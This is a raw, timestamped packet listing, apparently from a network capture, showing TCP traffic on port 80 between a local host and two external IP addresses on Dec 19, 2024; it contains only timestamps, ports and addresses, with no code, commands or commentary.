                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269469976 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269486904 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269503117 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269519091 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269535065 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269551039 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269553900 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269566059 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269589901 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269589901 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269606113 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269618988 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269629002 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269644976 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269651890 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269675970 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269685984 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269701004 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269701004 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269735098 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269743919 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269764900 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269773960 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269800901 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269804955 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269809961 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269824982 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269834042 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269860029 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269922018 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269980907 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.269996881 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270019054 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270037889 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270054102 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270064116 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270097971 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270142078 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270159960 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270200014 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270241976 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270256996 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270282030 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270294905 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270308971 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270311117 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270354033 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270380020 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270395994 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270421028 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270442963 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270494938 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270510912 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270533085 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270545006 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270550966 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270561934 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270585060 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270591974 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270606041 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270610094 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270627975 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270643950 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270661116 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270679951 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270690918 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270694971 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270708084 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270710945 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270734072 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270745039 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270747900 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270764112 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270797014 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270797014 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270800114 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.270839930 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.271641016 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.271740913 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.272047997 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.272064924 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.272102118 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.272118092 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.307862997 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.307888031 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.307967901 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.308835983 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.308901072 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.309195042 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.309241056 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.309674025 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.313334942 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.313486099 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.313534975 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.333740950 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.333760023 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.333838940 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.334929943 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.334988117 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.335323095 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.335376978 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.336050987 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.336067915 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.336097956 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.336123943 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.337385893 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.338042974 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.338097095 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.338819027 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.338834047 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.338885069 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.338921070 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.340302944 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.340321064 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.340429068 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.340981007 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.340997934 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.341032028 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.341059923 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.341713905 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.342713118 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.342766047 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.343298912 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.343348980 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.344305038 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.344356060 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.345205069 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.345254898 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.345953941 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.346740007 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.346755981 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.346790075 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.346818924 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.348572969 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.348589897 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.348644018 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.350116968 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.350135088 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.350198984 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.350971937 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.350990057 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.351022959 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.351058006 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.351808071 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.352608919 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.352664948 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.353283882 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.353354931 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.353991032 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.354041100 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.354825974 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.354872942 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.355427980 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.355474949 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.356221914 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.356270075 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.356790066 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.356820107 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.356838942 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.356862068 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.357588053 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.358320951 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.358374119 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.359123945 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.359270096 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.360001087 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.360017061 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.360049963 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.360068083 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.361699104 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.361716986 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.361815929 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.362389088 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.362405062 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.362436056 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.362464905 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.363817930 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.363832951 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.363884926 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.365366936 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.365384102 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.365442038 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.369335890 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.369354010 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.369409084 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.370163918 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.370213985 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.410038948 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.410156012 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.410797119 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.410860062 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.412019968 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.412173986 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.412244081 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.412709951 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.412727118 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.412774086 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.413333893 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.413361073 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.413376093 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.413408995 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.413428068 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.414015055 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.415159941 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.415175915 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.415215015 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.415225983 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.415884972 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.416495085 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.416548967 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.417238951 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.417253971 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.417285919 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.417298079 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.418962002 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.418978930 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.419012070 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.419023991 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.420126915 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.420142889 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.420188904 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.420773983 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.420840979 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.421511889 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.421529055 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.421576977 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.422247887 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.422290087 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.424779892 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.424834967 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.425383091 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.428071976 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.428088903 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.428137064 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.430910110 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.431356907 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.431688070 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.431735039 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.434118032 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.434166908 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.434848070 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.434899092 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.435534954 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.435551882 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.435585976 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.435596943 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.438559055 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.438575983 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.438625097 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.442173004 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.442190886 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.442243099 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.442944050 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.442991018 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.443639994 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.443692923 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.444500923 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.444551945 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.445147038 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.445194960 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.445919991 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.445943117 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.446007967 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.447413921 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.447463036 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.448072910 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.448097944 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.448121071 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.448131084 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.448797941 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.448842049 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.449467897 CET804973531.41.244.11192.168.2.4
